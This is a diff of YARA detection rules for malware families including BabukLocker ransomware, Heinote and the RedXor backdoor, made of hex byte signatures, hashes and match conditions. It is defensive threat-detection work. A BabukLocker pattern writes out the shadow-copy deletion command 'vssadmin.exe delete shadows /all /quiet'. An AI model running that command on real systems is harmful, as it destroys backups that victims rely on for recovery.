+		$s1 = { 68 38 3c 40 00 6a 00 68 01 00 1f 00 ff 15 c4 50 41 00 85 c0 75 11 68 58 3c 40 00 6a 00 6a 00 ff 15 98 50 41 00 eb 0a e9 b0 00 00 00 e9 ab 00 00 00 c7 45 a8 00 00 00 00 68 78 3c 40 00 8b 55 c8 52 8b 45 e8 50 e8 86 9b ff ff 83 c4 0c 0f b6 c8 83 f9 01 75 0c 8b 55 a8 52 e8 02 f9 ff ff 83 c4 04 e8 ea 94 ff ff ff 15 04 51 41 00 89 45 c0 83 7d c0 00 74 3f b8 41 00 00 00 66 89 45 f0 eb 0c 66 8b 4d f0 66 83 c1 01 66 89 4d f0 0f b7 55 f0 83 fa 5a 7f 1f 8b 45 c0 83 e0 01 74 }
+		$s2 = { 68 80 16 40 00 ff 15 38 50 41 00 89 45 f0 68 90 16 40 00 8b 45 f0 50 ff 15 34 50 41 00 89 45 fc 83 7d fc 00 74 07 8d 4d f8 51 ff 55 fc 6a 00 6a 00 68 b0 16 40 00 68 08 17 40 00 68 18 17 40 00 6a 00 ff 15 4c 51 41 00 e8 9d 03 00 00 85 c0 74 2d 68 24 17 40 00 ff 15 38 50 41 00 89 45 ec 68 34 17 40 00 8b 55 ec 52 ff 15 34 50 41 00 89 45 f4 83 7d }
+		$s3 = { 81 ec f4 02 00 00 c7 85 7c ff ff ff 90 15 40 00 c7 45 80 98 15 40 00 c7 45 84 a0 15 40 00 c7 45 88 a8 15 40 00 c7 45 8c b0 15 40 00 c7 45 90 b8 15 40 00 c7 45 94 c0 15 40 00 c7 45 98 c8 15 40 00 c7 45 9c d0 15 40 00 c7 45 a0 d8 15 40 00 c7 45 a4 e0 15 40 00 c7 45 a8 e8 15 40 00 c7 45 ac f0 15 40 00 c7 45 b0 f8 15 40 00 c7 45 b4 00 16 40 00 c7 45 b8 08 16 40 00 c7 45 bc 10 16 40 00 c7 45 c0 18 16 40 00 c7 45 c4 20 16 40 00 c7 45 c8 28 16 40 00 c7 45 cc 30 16 40 00 c7 45 d0 38 16 40 00 c7 45 d4 40 16 40 00 c7 45 d8 48 16 40 00 c7 45 dc 50 16 40 00 c7 45 e0 58 16 40 00 c7 45 fc 00 00 00 00 c7 45 e4 78 00 00 00 c7 45 e8 00 00 00 00 c7 45 f4 00 00 00 00 eb 09 8b 45 f4 83 c0 01 89 45 f4 83 7d f4 1a 7d 35 8b 4d f4 8b 94 8d 7c ff ff ff 52 ff 15 f8 50 41 00 83 f8 01 75 1d 8b 45 fc 8b 4d f4 8b 94 8d 7c ff ff ff 89 94 85 14 ff ff ff 8b 45 fc 83 c0 01 89 45 fc eb bc b9 02 00 00 00 6b d1 00 33 c0 66 89 84 15 0c fd ff ff 68 00 00 01 00 e8 00 e8 00 00 83 c4 04 89 45 f8 83 7d f8 00 0f 84 d4 00 00 00 68 00 00 01 00 e8 e6 e7 00 00 83 c4 04 89 45 ec 83 7d ec 00 0f 84 ae 00 00 00 68 00 80 00 00 8b 4d f8 51 ff 15 08 51 41 00 89 45 f0 83 7d fc 00 76 63 8d 55 e8 52 8b 45 e4 50 8d 8d 0c fd ff ff 51 8b 55 f8 52 ff 15 f4 50 41 00 85 c0 74 26 8d 85 0c fd ff ff 50 ff 15 40 50 41 00 83 f8 03 75 14 b9 02 00 00 00 6b d1 00 33 c0 66 89 84 15 0c fd ff ff eb 22 8b 4d fc 83 e9 01 89 4d fc 8b 55 f8 52 8b 45 fc 8b 8c 85 14 ff ff ff 51 ff 15 44 50 41 00 eb 02 eb 1b 68 00 80 00 00 8b 55 f8 52 8b 45 f0 50 ff 15 00 51 41 00 85 c0 0f 85 7a ff ff ff 8b 4d f0 51 ff 15 fc 50 41 00 8b 55 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 300KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and all of them
 }
-rule ARKBIRD_SOLG_APK_Droidwatcher_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Babuklockers_Jan_2021_1 : FILE
 {
 	meta:
-		description = "Detect modified DroidWatcher stealer used by Void Balaur group"
+		description = "Detect the BabukLocker ransomware"
 		author = "Arkbird_SOLG"
-		id = "04e02521-d89a-5f72-8b6f-0350f6defdd0"
-		date = "2021-11-11"
-		modified = "2021-11-12"
-		reference = "https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-11/Void_Balaur/APK_DroidWatcher_Nov_2021_1.yara#L1-L19"
+		id = "a3bad41d-59fb-564f-a352-ca38af582c08"
+		date = "2020-01-03"
+		modified = "2021-01-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-02/BabukLocker/Ran_BabukLockers_Jan_2021_1.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "c16bcdd5d9cd6a3cbb527893e13ac967211d1686edd9f7ae03e37feada725a1b"
+		logic_hash = "8939e408948dd7b17acdac5c6b5f50db24ec63f19937b8663a15f52b678d0065"
 		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "902c5f46ac101b6f30032d4c5c86ecec115add3605fb0d66057130b6e11c57e6"
-		tlp = "white"
+		hash1 = "8203c2f00ecd3ae960cb3247a7d7bfb35e55c38939607c85dbdb5c92f0495fa9"
 		level = "Experimental"
-		adversary = "Void Balaur"
 
 	strings:
-		$s1 = { 38 50 F4 59 CC FF F3 37 65 28 4F 35 1A D2 83 C9 6C E0 20 27 38 C5 39 2E 72 95 5B 3C E0 29 D1 9E C7 0C A4 21 1B 55 09 A5 0B 83 99 C8 7C D6 F2 0F 47 B9 CE 43 82 5E C4 0C }
-		$s2 = { 3C E2 39 81 D4 EA 82 1F F8 83 42 54 A0 2E 6D E8 C5 44 E6 B0 92 13 5C E6 21 EF 89 9D 26 28 90 8C 3C 94 A3 36 AD E9 CD 48 26 B2 92 1D 1C E4 34 57 B9 C7 2B A2 7D 1E 14 A8 4A 4D 5A D3 8E 2E F4 A4 1F 83 19 C1 58 A6 32 9B 05 2C 63 03 DB B9 42 }
-		$s3 = { F0 96 6F 33 59 1B BA 32 82 8D 5C 22 28 B3 1E 4C 65 BA 31 99 4D 1C E0 2E 89 7E F3 1E 94 A7 13 13 08 E7 22 31 7E D7 EB 28 42 53 46 B0 81 73 7C 22 E3 1F 62 4E 17 66 B2 8F 47 A4 CA A2 D6 68 C9 44 36 72 9D 78 7F 7A 16 B5 18 CA 5A 4E F2 92 74 59 }
-		$s4 = { 3D 57 89 56 4D 9E 51 9C CE 2C 20 92 B8 D5 C5 81 7A 8C 65 03 17 F9 C0 77 35 5C 4F 0B 26 B0 99 0B C4 A9 69 5D A9 44 0F 66 F2 2F F7 48 5C 4B 7E 50 9D 41 2C E0 34 AF 89 5F 5B 9E 50 92 C6 F4 65 3C 0B D8 CA 1E CE F3 80 CF EA B8 9E 94 A4 E5 37 72 51 88 0A 34 A3 2F 03 19 CE 41 22 B8 C9 5D 1E F2 82 77 44 AF AB }
-		$s5 = { FA D6 A4 0F EB 79 42 D2 76 F6 54 BA B2 9A 27 FC D0 5E 9E 30 8D 2B 24 E9 A0 AE A8 41 33 06 32 84 51 8C 63 12 33 98 CF 72 36 B0 8B 83 1C E3 12 D7 B8 CD 63 5E 13 B3 A3 FE 45 06 8A D0 80 3E 0C 66 32 33 59 C6 66 0E 10 C1 39 AE F3 84 D7 C4 EF E4 EC C8 37 64 22 17 F9 28 42 45 3A 31 9E A5 EC E1 14 37 79 C0 DB FF FD B6 B3 E7 F3 3B 45 A9 45 28 E3 D9 }
+		$seq1 = { 55 8b ec 83 ec 14 a1 b0 81 40 00 33 c5 89 45 fc c7 45 f8 ff ff ff ff c7 45 f4 00 40 00 00 8d 45 f0 50 8b 4d 08 51 6a 13 6a 00 6a 02 e8 85 2b 00 00 85 c0 0f 85 a3 00 00 00 8b 55 f4 52 e8 ae 06 00 00 83 c4 04 89 45 08 83 7d 08 00 0f 84 81 00 00 00 8d 45 f4 50 8b 4d 08 51 8d 55 f8 52 8b 45 f0 50 e8 55 2b 00 00 85 c0 75 5c c7 45 ec 00 00 00 00 eb 09 8b 4d ec 83 c1 01 89 4d ec 8b 55 ec 3b 55 f8 73 40 8b 45 ec c1 e0 05 8b 4d 08 8b 54 01 0c 83 e2 02 74 14 8b 45 ec c1 e0 05 03 45  }
+		$seq2 = { 68 68 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0c c7 85 b0 fd ff ff 01 00 00 00 eb 58 68 74 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0c c7 85 b0 fd ff ff 00 00 00 00 eb 2b 68 80 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0a c7 85 b0 fd ff ff ff ff ff ff e9 55 ff ff ff 6a 00 6a 00 ff 15 a8 90 40 00 e8 aa 04 00 00 e8 05 }
+		$seq3 = { 83 c4 0c 68 f4 00 00 00 8d 85 f4 fd ff ff 50 68 88 22 40 00 ff 15 6c 90 40 00 68 98 22 40 00 8d 8d f4 fd ff ff 51 ff 15 c4 90 40 00 c7 85 ec fd ff ff 00 00 00 00 6a 00 68 80 00 00 00 6a 01 6a 00 6a 01 68 00 00 00 40 8d 95 f4 fd ff ff 52 ff 15 70 90 40 00 89 85 98 fd ff ff 83 bd 98 fd ff ff ff 0f 84 2e 03 00 00 6a 00 8d 85 ec fd ff ff 50 68 90 00 00 00 68 78 82 40 00 8b 8d 98 fd ff ff 51 ff 15 90 90 }
+		$s1 = "\\ecdh_pub_k.bin" fullword wide
+		$s2 = "ntuser.dat.log" fullword wide
+		$s3 = "cmd.exe" fullword ascii
+		$s4 = "/c vssadmin.exe delete shadows /all /quiet" fullword wide
+		$s5 = { 5c 00 5c 00 3f 00 5c 00 00 00 00 00 3a 00 00 00 98 2f }
 
 	condition:
-		uint32be( 0 ) == 0x504B0304 and filesize > 300KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize > 15KB and 2 of ( $seq* ) and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Moriya_May_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Heinote_June_2020_1 : FILE
 {
 	meta:
-		description = "Detect Moriya rootkit used in the TunnelSnake operation"
+		description = "Detect Hienote malware"
 		author = "Arkbird_SOLG"
-		id = "6a78ddc0-b39f-5aec-9c54-980854173abf"
-		date = "2020-05-07"
-		modified = "2021-05-26"
-		reference = "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-26/Moriya/MAL_Moriya_May_2021_1.yara#L1-L27"
+		id = "5c0e604a-83d4-5c6f-83fa-0df878da80d8"
+		date = "2020-06-26"
+		modified = "2023-11-22"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1276471822217891840"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-26/Heinote_June_2020-1.yar#L1-L29"
 		license_url = "N/A"
-		logic_hash = "f73049f261428c8921a2c8a86fb5d242719e5dc9f30a5c58e86be1a79d84a42d"
+		logic_hash = "679f1113c9c770910d18da395b13aaef009ecdde91a0c11f931d0d7e63ed122a"
 		score = 75
-		quality = 75
+		quality = 61
 		tags = "FILE"
-		hash1 = "3eda93de4a1e7a35c040fad914a4885d079ffc3c1362153b74e10ff9121de22b"
-		hash2 = "d620f9c32adc39b0632f22ec6a0503bf906fd1357f4435463fbb4b422634a536"
-		tlp = "White"
-		adversary = "Chinese APT Group"
+		hash1 = "e0a34b9c420ddd930b3f89c13c3f564907dd948e88f668a0fe55ce506220bd73"
 
 	strings:
-		$seq1 = { 4c 8d 05 13 10 00 00 ff 15 95 12 00 00 48 8d 15 36 10 00 00 48 8d 4d c0 ff 15 fc 12 00 00 48 8d 15 65 10 00 00 48 8d 4d d0 ff 15 eb 12 00 00 48 8d 05 cc 23 00 00 41 b9 22 00 00 00 48 89 44 24 30 4c 8d 45 c0 c6 44 24 28 00 33 d2 83 64 24 20 00 48 8b cb ff 15 f0 11 00 00 33 d2 41 8b ce 8b f8 85 c0 79 09 4c 8d 05 6e }
-		$seq2 = { 4c 8d 05 85 10 00 00 ff 15 27 12 00 00 48 8b 05 80 23 00 00 48 8d 55 c0 48 8d 4d d0 83 48 30 04 ff 15 be 11 00 00 e8 c5 01 00 00 33 d2 41 8b ce 85 c0 79 0c }
-		$seq3 = { 33 db 48 8b 74 24 30 4c 8b 7c 24 38 48 8b 7c 24 40 4c 8b 64 24 48 4d 8b ec 48 8d 4c 24 58 ff 15 b7 1c 00 00 48 8b 46 10 49 89 44 24 f8 48 8b 46 08 49 89 45 f0 41 80 65 bb 0f 8a 46 18 24 0f 41 08 45 bb 4c 8b 4e 08 }
-		$seq4 = { 48 83 64 24 58 00 ba 44 5c 00 00 c7 44 24 50 79 00 00 00 41 b9 76 00 00 00 c7 44 24 48 78 6f 00 00 41 b8 69 72 00 00 c7 44 24 40 72 70 00 00 c7 44 24 38 69 00 00 00 c7 44 24 30 73 6e 00 00 c7 44 24 28 5c 00 00 00 c7 44 24 20 72 65 00 00 e8 03 f6 ff ff 48 8d 55 80 48 8d 4c 24 70 ff 15 74 17 00 00 48 8d 05 2d 28 00 00 45 33 c9 48 89 44 24 38 45 33 c0 48 8b 05 eb 16 00 00 48 83 64 24 30 00 c6 44 24 28 00 41 8d 51 40 48 8b 08 48 89 4c 24 20 48 8d 4c 24 70 ff 15 d9 16 00 00 85 c0 78 31 48 8b 0d ee 27 00 00 48 8b 81 e0 00 00 00 48 89 05 d8 27 00 00 48 8d 05 19 f7 ff ff 87 81 e0 00 00 00 48 8b 0d cc 27 00 00 ff 15 c6 16 00 00 33 c0 48 8b 4d 00 48 33 cc e8 58 0b 00 00 48 81 c4 10 01 00 }
-		$seq5 = { 40 55 53 56 57 41 56 48 8d ac 24 40 ff ff ff 48 81 ec c0 01 00 00 48 8b 05 47 1e 00 00 48 33 c4 48 89 85 b8 00 00 00 48 83 64 24 38 00 49 8b d8 48 83 64 24 50 00 48 8b fa 48 8b f1 33 d2 41 b8 c8 00 00 00 48 8d 4c 24 60 4d 8b f1 e8 0b 06 00 00 33 c0 48 8d 4d 30 0f 57 c0 48 89 85 b0 00 00 00 33 d2 0f 11 85 90 00 00 00 44 8d 40 58 0f 11 85 a0 00 00 00 e8 e2 05 00 00 0f 10 07 48 83 64 24 20 00 48 8d 05 72 f8 ff ff 48 89 44 24 40 48 8d 54 24 28 48 8d 05 81 fd ff ff 4d 8b c6 48 8b cb 48 89 44 24 48 f3 0f 7f 44 24 28 e8 13 05 00 00 8b d8 85 c0 0f 88 da 00 00 00 0f 10 07 48 8b 0d f7 1f 00 00 48 8d 05 30 0a 00 00 45 33 c9 48 89 45 40 f3 0f 7f 45 30 45 33 c0 48 8d 55 30 0f 10 06 48 89 45 48 f3 0f 7f 45 70 e8 22 05 00 00 8b d8 85 c0 0f 88 93 00 00 00 0f 10 06 83 65 c0 00 48 8d 05 14 0a 00 00 0f 10 0d 5d 0f 00 00 83 a5 a0 00 00 00 00 48 8d 54 24 60 48 8b 0d 9a 1f 00 00 45 33 c9 f3 0f 7f 45 a0 48 89 44 24 70 45 33 c0 0f 10 07 48 89 44 24 78 48 8d 85 90 00 00 00 48 89 45 d8 48 8d 44 24 20 f3 0f 7f 45 e4 c7 45 e0 03 50 00 00 0f 10 05 ff 0e 00 00 c7 45 d0 01 00 00 00 f3 0f 7f 8d 90 00 00 00 c7 85 a8 00 00 00 00 01 00 00 f3 0f 7f 45 b0 48 89 85 b0 00 00 00 e8 91 04 00 00 8b d8 85 c0 79 08 41 8b 0e e8 35 04 00 00 8b c3 48 8b 8d b8 00 00 00 48 33 cc e8 96 02 00 00 48 81 c4 c0 01 00 00 41 5e 5f 5e 5b }
-		$s1 = "Moriya : NotifyFunction\n" fullword ascii
-		$s2 = "Moriya Filter" fullword wide
-		$s3 = "Moriya : DeviceControlDispatch!\n" fullword ascii
-		$s4 = "Moriya : Waiting...\n" fullword ascii
-		$s5 = "Moriya : WriteDispatch!\n" fullword ascii
-		$s6 = { 5c 00 44 00 65 00 76 00 69 00 63 00 65 00 5c 00 4d 00 6f 00 72 00 69 00 79 00 61 00 53 00 74 00 72 00 65 00 61 00 6d 00 57 00 61 00 74 00 63 00 68 00 6d 00 65 00 6e }
-		$s7 = { 5c 00 44 00 6f 00 73 00 44 00 65 00 76 00 69 00 63 00 65 00 73 00 5c 00 4d 00 6f 00 72 00 69 00 79 00 61 00 53 00 74 00 72 00 65 00 61 00 6d 00 57 00 61 00 74 00 63 00 68 00 6d 00 65 00 6e }
-		$s8 = "Moriya start\n" fullword ascii
+		$s1 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 53 45 54 5d 2d 2d 2d 2d }
+		$s2 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 47 45 54 5d 2d 2d 2d 2d }
+		$s3 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 47 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 47 65 74 4d 61 69 6e 50 61 67 65 20 6c 70 73 7a 75 72 6c 20 3d 20 25 73 }
+		$s4 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 73 74 61 74 75 73 20 3d 20 25 64 2f 25 64 20 67 65 74 20 3d 20 25 73 20 73 65 74 20 3d 20 25 73 }
+		$s5 = { 44 65 62 75 67 49 6e 66 6f }
+		$s6 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 2d 2d 2d 2d }
+		$s7 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 66 61 76 20 72 65 74 20 3d 20 25 64 0a }
+		$s8 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 69 20 3d 20 25 64 20 6c 70 73 7a 4d 61 67 69 63 20 3d 20 25 73 0a }
+		$s9 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 53 45 54 43 4f 4f 4b 49 45 48 41 4f 31 32 33 5d 20 6f 6b 20 6f 6b 0a }
+		$s10 = { 75 73 65 72 6e 61 6d 65 3d 22 25 73 22 2c 20 72 65 61 6c 6d 3d 22 25 73 22 2c 20 6e 6f 6e 63 65 3d 22 25 73 22 2c 20 75 72 69 3d 22 25 73 22 2c 20 63 6e 6f 6e 63 65 3d 22 25 73 22 2c 20 6e 63 3d 25 30 38 78 2c 20 71 6f 70 3d 25 73 2c 20 72 65 73 70 6f 6e 73 65 3d 22 25 73 22 }
+		$s11 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" fullword ascii
+		$s12 = { 25 73 20 63 6f 6f 6b 69 65 20 25 73 3d 22 25 73 22 20 66 6f 72 20 64 6f 6d 61 69 6e 20 25 73 2c 20 70 61 74 68 20 25 73 2c 20 65 78 70 69 72 65 20 25 49 36 34 64 0a }
+		$s13 = "User-Agent: %s" fullword ascii
+		$s14 = "Send failure: %s" fullword ascii
+		$s15 = "ftp://%s:%s@%s" fullword ascii
+		$s16 = "Host: %s%s%s" fullword ascii
+		$s17 = "Referer: %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 6KB and ( 3 of ( $seq* ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x4D5A and filesize < 450KB and 14 of them
 }
-rule ARKBIRD_SOLG_MAL_Moriya_May_2021_2 : FILE
+rule ARKBIRD_SOLG_MAL_Redxor_Feb_2021_1 : FILE
 {
 	meta:
-		description = "Detect Moriya rootkit used in the TunnelSnake operation"
+		description = "Detect RedXor backdoor (Feb 2021)"
 		author = "Arkbird_SOLG"
-		id = "25cecff1-94f9-5e8d-8758-9b891e9d7373"
-		date = "2020-05-26"
-		modified = "2021-05-27"
-		reference = "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-26/Moriya/MAL_Moriya_May_2021_2.yara#L1-L22"
+		id = "10ae10b7-b351-5dda-9408-aa01a40e3d6a"
+		date = "2021-03-14"
+		modified = "2021-05-24"
+		reference = "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-23/RedXor/MAL_RedXor_Feb_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "11ef00940604c3337b1c8c00903297343cfd4e8f3899b949d58e4203ab68d3fd"
+		logic_hash = "b4e3ea24bb19abe7065ed5fc94f65e68ea84b11da7b45936ee991ef6aac6d33d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "ce21319bd21f76ab0f188a514e8ab1fe6f960c257475e45a23d11125d78df428"
+		hash1 = "0423258b94e8a9af58ad63ea493818618de2d8c60cf75ec7980edcaa34dcc919"
+		hash2 = "0a76c55fa88d4c134012a5136c09fb938b4be88a382f88bf2804043253b0559"
 		tlp = "White"
-		adversary = "Chinese APT Group"
+		adversary = "Winnti"
 
 	strings:
-		$seq1 = { 8b 35 c4 30 40 00 8d 45 dc 68 92 24 40 00 50 ff d6 68 cc 24 40 00 8d 45 e4 50 ff d6 68 58 42 40 00 57 57 6a 22 8d 45 dc 50 57 53 ff 15 5c 30 40 00 8b f0 85 f6 0f 88 0a ff ff ff a1 58 42 40 00 83 48 1c 04 8d 45 dc 50 8d 45 e4 50 ff 15 60 30 40 00 e8 b2 00 00 00 }
-		$seq2 = { 68 3c 24 40 00 50 ff 15 c4 30 40 00 8d 85 d8 fe ff ff 50 ff 15 bc 30 40 00 85 c0 74 1b 8d 8d e0 fe ff ff 51 ff d0 8b 8d e4 fe ff ff 8b 85 e8 fe ff ff 0f b7 5d f4 eb 28 53 8d 85 cc fe ff ff 50 8d 85 d4 fe ff ff 50 8d 85 d0 fe ff ff 50 ff 15 ac 30 40 00 8b 8d d0 fe ff ff 8b 85 d4 fe ff ff c1 e1 08 0f b6 c0 0b c1 0f b6 cb }
-		$seq3 = { 8b 75 c0 8d 45 cc 50 ff 15 94 30 40 00 8b 5d c8 8b 43 0c 8b 55 bc 89 42 20 8b 43 08 89 42 1c 80 62 03 0f 8a 43 10 24 0f 08 42 03 8b 4b 08 85 c9 74 30 80 7e 24 00 74 06 f6 43 10 20 75 17 8b 46 18 85 c0 78 0a f6 43 10 40 75 0a 85 c0 79 20 f6 43 10 80 74 1a ff 73 0c 56 ff 75 b4 ff d1 8b f8 eb 0d 80 7e 21 00 74 07 8b 46 60 80 48 03 01 68 74 6e 68 00 53 ff 15 b4 30 40 00 }
-		$seq4 = { 6a 79 68 78 6f 00 00 68 72 70 00 00 6a 69 68 73 6e 00 00 6a 5c 68 72 65 00 00 6a 76 68 69 72 00 00 68 44 5c 00 00 50 e8 a2 f8 ff ff 83 c4 30 8d 85 7c ff ff ff 50 8d 85 6c ff ff ff 50 ff 15 c4 30 40 00 a1 88 30 40 00 68 34 42 40 00 56 56 ff 30 8d 85 6c ff ff ff 56 56 6a 40 50 ff 15 90 30 40 00 }
-		$seq5 = { 55 8b ec 81 ec 28 01 00 00 a1 04 40 40 00 33 c5 89 45 fc 8b 45 08 53 8b 5d 10 56 8b 75 0c 57 89 85 e8 fe ff ff 8d 7d 88 8b 45 14 6a 07 89 85 e4 fe ff ff 33 c0 59 f3 ab 33 ff 89 b5 d8 fe ff ff 68 94 00 00 00 8d 85 f0 fe ff ff 89 bd ec fe ff ff 57 50 e8 48 03 00 00 6a 06 89 7d e0 33 c0 59 8d 7d e4 f3 ab 33 ff 8d 45 a8 6a 38 57 50 89 7d a4 e8 2a 03 00 00 89 bd dc fe ff ff 8d 45 84 89 bd e0 fe ff ff 83 c4 18 89 bd dc fe ff ff 89 bd e0 fe ff ff 8d 7d 84 a5 ff b5 e4 fe ff ff 50 a5 53 a5 a5 c7 45 98 68 1b }
-		$s1 = "\\Device\\MoriyaStreamWatchmen" fullword wide
-		$s2 = "Moriya Filter" fullword wide
-		$s3 = "Moriya Callout" fullword wide
-		$s4 = "\\DosDevices\\MoriyaStreamWatchmen" fullword wide
+		$seq1 = { 0f b7 05 [2] 20 00 66 85 c0 0f 85 cd 00 00 00 48 8d 85 ?? ff ff ff be 10 00 00 00 48 89 c7 e8 [2] ff ff 66 c7 85 ?? ff ff ff 02 00 0f b7 05 [2] 20 00 0f b7 c0 89 c7 e8 [2] ff ff 66 89 85 ?? ff ff ff 48 8b 45 d8 48 89 c7 e8 [2] ff ff 89 85 ?? ff ff ff ba 00 00 00 00 be 01 00 00 00 bf 02 00 00 00 e8 [2] ff ff 89 85 ?? ff ff ff 83 bd ?? ff ff ff ff 75 21 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 }
+		$seq2 = { 48 8d 8d ?? ff ff ff 8b 85 ?? ff ff ff ba 10 00 00 00 48 89 ce 89 c7 e8 [2] ff ff 83 f8 ff 75 47 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 }
+		$seq3 = { 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8b 95 [2] fd ff 48 8d 85 [2] fd ff 48 89 ce 48 89 c7 b8 00 00 00 00 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 89 85 30 ff ff ff 8b 85 30 ff ff ff 48 63 d8 8b 85 30 ff ff ff 48 63 c8 48 8d 95 [2] fd ff 48 8d 85 [2] fe ff 49 89 d8 be [2] 40 00 48 89 c7 e8 [2] ff ff 89 85 2c ff ff ff 8b 85 2c ff ff ff 48 63 d0 48 8d 9d [2] fe ff 8b 85 ?? ff ff ff b9 00 00 00 00 48 89 de 89 c7 e8 [2] ff ff 48 83 f8 ff 75 21 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 }
+		$seq4 = { c7 45 a8 01 00 00 00 c7 45 ac 01 00 00 00 c7 05 [2] 20 00 00 00 00 00 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8d 85 [2] fd ff ba ?? 00 00 00 48 89 ce 48 89 c7 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 48 89 c2 8b 85 ?? ce fd ff 48 8d 8d [2] fd ff 48 89 ce 89 c7 e8 [2] ff ff 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff 8b 85 ?? ce fd ff 48 8d 8d [2] fd ff ba ff 0f 00 00 48 89 ce 89 c7 e8 [2] ff ff 89 85 40 ff ff ff 83 bd 40 ff ff ff ff 75 0a c7 85 40 ff ff ff 00 00 00 00 48 8d 85 [2] fd ff be [2] 40 00 48 89 c7 e8 [2] ff ff 48 85 c0 0f 84 d0 00 00 00 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8d 85 [2] fd ff ba 02 00 00 00 48 89 ce 48 89 c7 e8 [2] ff ff e8 [2] ff ff 89 c7 e8 [2] ff ff 48 89 45 e8 be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff 48 8b 45 e8 48 8b 00 48 89 c6 bf [2] 60 00 e8 [2] ff ff be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff bb [2] 40 00 48 8d 95 [2] fd ff 48 8d 85 [2] fd ff 41 b8 [2] 60 00 48 89 d1 ba [2] 60 00 48 89 de 48 89 c7 b8 00 00 00 00 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 89 85 30 ff ff ff c7 45 ac 00 00 00 }
+		$seq5 = { 55 48 89 e5 53 89 fb 89 f0 48 89 55 d8 89 4d d4 88 5d e4 88 45 e0 0f b6 45 e4 88 45 f2 0f b6 45 e0 88 45 f3 c7 45 f4 00 00 00 00 c7 45 f4 00 00 00 00 eb 29 8b 45 f4 48 98 48 03 45 d8 8b 55 f4 48 63 d2 48 03 55 d8 0f b6 0a 0f b6 55 f2 31 ca 88 10 0f b6 45 f3 00 45 f2 83 45 f4 01 8b 45 f4 3b 45 d4 7c cf b8 00 00 00 00 5b }
